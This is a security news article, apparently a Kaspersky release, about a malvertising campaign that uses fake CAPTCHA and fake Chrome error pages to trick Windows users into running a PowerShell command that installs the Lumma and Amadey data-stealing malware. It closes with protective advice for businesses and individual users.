New cyber attack campaign targets PC users with fake CAPTCHAs and browser errors

A new wave of the malicious campaign spreading through online ads and targeting users of Windows computers has been discovered by Kaspersky. While browsing the web, users may click on an invisible ad that covers the entire screen and redirects them to a fake CAPTCHA page or a fake Chrome error message prompting them to follow steps to download malware. Data from Kaspersky's telemetry captured over 140,000 incidents with these malicious ads in September and October 2024, while over 20,000 users were redirected to misleading malicious websites. Most of the incidents involved users from Brazil, Spain, Italy and Russia. To protect themselves, experts advise users to be cautious and avoid following suspicious messages asking them to take action online.

CAPTCHA is a security feature used on websites and applications to confirm whether a user is a human or an automated program or bot. Earlier this year, there were reports of attackers distributing the Lumma malware via fake CAPTCHAs, mainly targeting gamers. When browsing gaming sites, users were directed to click on an ad that covered the entire screen. They were then redirected to a fake CAPTCHA page with misleading instructions persuading them to download the malware. When users clicked the "I am not a robot," a coded Windows PowerShell command was copied to their computer clipboard. They were then prompted to paste it into the terminal and press Enter, unintentionally downloading and launching Lumma. The malware searched for cryptocurrency-related files, cookies, and password manager data on the victim's device. It also visited websites of various e-commerce platforms, increasing their views, offering the attackers additional financial benefit.

In the new wave of attacks, Kaspersky researchers have identified another attack scenario in which, instead of a CAPTCHA, a web page error message appears, configured to look like a Chrome browser service message. The attackers instruct the user to "copy fix" to the terminal window (while the fix is the same malicious PowerShell command as described above).

Kaspersky discovered that the new wave of attacks targets not only gamers but also other user groups and is distributed via file-sharing services, web applications, betting sites, adult content sites, anime communities and other channels. Attackers are also using the Amadey Trojan in this wave of attacks - which, like Lumma, steals data from popular browsers and cryptocurrency wallets, but also takes screenshots, obtains service details for remote access and downloads a remote access tool to the victim's device, allowing attackers to gain full access to it.

To block threats related to malicious data theft software, follow the recommendations below.

Businesses:

• Check if the credentials for your company's devices or web applications have been compromised by malicious data theft software on the dedicated Kaspersky Digital Footprint Intelligence page.
• Use a specialized security method s that offers application and web scanning. Behavioral analysis helps to rapidly detect malicious activity.
• Enhance your employees' digital literacy to minimize human factor contribution to digital risks by using an online tool that offers comprehensive staff training.

Individual Users:

• Use a comprehensive security method on all your devices to prevent suspicious pages or phishing emails from opening.
• Use a Password Manager to store your passwords securely.